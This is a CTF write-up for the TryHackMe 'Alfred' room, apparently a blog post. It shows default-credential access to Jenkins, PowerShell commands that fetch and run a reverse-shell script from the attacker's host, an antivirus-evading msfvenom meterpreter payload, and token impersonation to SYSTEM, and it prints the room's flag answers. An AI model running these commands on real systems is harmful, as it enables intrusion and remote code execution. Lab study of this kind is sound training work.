TryHackMe : Alfred

Emre Alkaya
7 min read · Nov 3, 2020


Room: Alfred

Difficulty: Easy

“Today we will be looking at Alfred from TryHackMe. Capture the flags and have fun.”

Task 1 : Initial Access

In this room, we’ll learn how to exploit a common misconfiguration on a widely used automation server (Jenkins — this tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they make a change to it). After which, we’ll use an interesting privilege escalation method to get full system access.

Since this is a Windows application, we’ll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we’ll be using the reverse shell scripts.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

#1 How many ports are open? (TCP only)

We can see open ports 80, 3389 and 8080.

ans : 3

#2 What is the username and password for the log in panel (in the format username:password)?

We can see that ports 80 and 8080 are open. We go to the website on port 80 first.

Then we check port 8080.

That’s awesome. We find a Jenkins login page. We can research it on Google.

We can try the default login, user and password. But it was incorrect.

We can try admin/admin.

That’s correct; we are inside the website.

We could use Burp Suite and Hydra to brute-force the admin password, but since the default password works, we don’t need them here.

ans : admin/admin

#3 Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server

We have to do what we’re asked to do above.

#4 What is the user.txt flag?

We are going to open ip:8080 and then open the “project” item.

We can see that page.

We are going to open “Configure”.

Apply and save.

And then click “Build Now”.

Success! We are inside the machine!

We can find user.txt.

ans : 79007a09481963edf2e1321abd9ae2a0

Task 2 : Switching Shells

To make the privilege escalation easier, let’s switch to a meterpreter shell using the following process.

Use msfvenom to create the a windows meterpreter reverse shell using the following payload

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe

This payload generates an encoded x86-64 reverse tcp meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly, and also to evade anti-virus products. An anti-virus product may not recognise the payload and won’t flag it as malicious.

After creating this payload, download it to the machine using the same method in the previous step:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

Before running this program, ensure the handler is set up in metasploit:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run

This step uses the metasploit handler to receive the incoming connection from your reverse shell. Once this is running, enter this command to start the reverse shell:

Start-Process "shell-name.exe"

This should spawn a meterpreter shell for you!

#1 What is the final size of the exe payload that you generated?

ans : 73803

But I will continue with the exploit.

Set lhost and lport.

You can use either the “exploit” or the “run” command.

We can create an HTTP server. We can use python3 -m http.server or SimpleHTTPServer.

This is the PowerShell command. It was given to us above.

Success! We are inside the machine.

Task 3 : Privilege Escalation

Now that we have initial access, let’s use token impersonation to gain system access.

Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe (think of this as an authentication process).

This access token consists of:

user SIDs (security identifiers)
group SIDs
privileges

amongst other things. More detailed information can be found here.

There are two types of access tokens:

primary access tokens: those associated with a user account that are generated on log on
impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process

For an impersonation token, there are different levels:

SecurityAnonymous: current user/client cannot impersonate another user/client
SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client
SecurityImpersonation: current user/client can impersonate the client’s security context on the local system
SecurityDelegation: current user/client can impersonate the client’s security context on a remote system

where the security context is a data structure that contains users’ relevant security information.

The privileges of an account (which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:

SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege

There’s more reading here.

#1 View all the privileges using whoami /priv

Use whoami /priv.

We can see the privileges information. “Enabled” is the important detail for us.

SeDebugPrivilege Debug programs Enabled

SeChangeNotifyPrivilege Bypass traverse checking Enabled

SeImpersonatePrivilege Impersonate a client after authentication Enabled

SeCreateGlobalPrivilege Create global objects Enabled
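As an added example (not part of the original writeup), here is a small Python audit script that parses whoami /priv output like the listing above and reports which of the commonly abused privileges from Task 3 are actually Enabled. A defender can run it over the output collected from service accounts (such as the one Jenkins runs under) to spot over-privileged configurations; the sample output embedded below is constructed to match the listing, with one Disabled row added.

```python
import re

# Privileges Task 3 lists as most commonly abused. The writeup says
# "SeAssignPrimaryPrivilege"; the Windows name is SeAssignPrimaryTokenPrivilege.
ABUSED_PRIVILEGES = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeTcbPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeCreateTokenPrivilege", "SeLoadDriverPrivilege",
    "SeTakeOwnershipPrivilege", "SeDebugPrivilege",
}

# Constructed sample, laid out like real `whoami /priv` output (one extra
# Disabled row added to show that the state matters, not just presence).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeDebugPrivilege              Debug programs                            Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeBackupPrivilege             Back up files and directories             Disabled
"""

# A privilege row starts with an Se...Privilege name and ends with the state;
# the description between them contains spaces, so anchor on both ends only.
_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} for every privilege row in the output."""
    privs = {}
    for line in text.splitlines():
        match = _ROW.match(line.strip())
        if match:
            privs[match.group(1)] = match.group(2)
    return privs


def abused_and_enabled(privs):
    """Sorted names that are both Enabled and on the commonly-abused list."""
    return sorted(name for name, state in privs.items()
                  if state == "Enabled" and name in ABUSED_PRIVILEGES)


if __name__ == "__main__":
    flagged = abused_and_enabled(parse_whoami_priv(SAMPLE_WHOAMI_PRIV))
    print("Commonly abused privileges enabled:", ", ".join(flagged) or "none")
```

On the sample the script flags SeDebugPrivilege and SeImpersonatePrivilege, the same two the next task builds on, while ignoring SeChangeNotifyPrivilege (not on the list) and SeBackupPrivilege (present but Disabled).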

#2 You can see that two privileges (SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability. Enter: load incognito to load the incognito module in metasploit. Please note, you may need to use the use incognito command if the previous command doesn’t work. Also ensure that your metasploit is up to date.

Run load incognito.

We can see the incognito commands.

#3 To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available. Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token. What is the output when you run the getuid command?

We saw how to use it with the help command.

ans : NT AUTHORITY\SYSTEM

#4 Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS

We find the root flag.

ans : dff0f748678f280250f25a45b8046b4a

This box was really fun! I love the ones that have a story/theme that goes along with them.

Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!
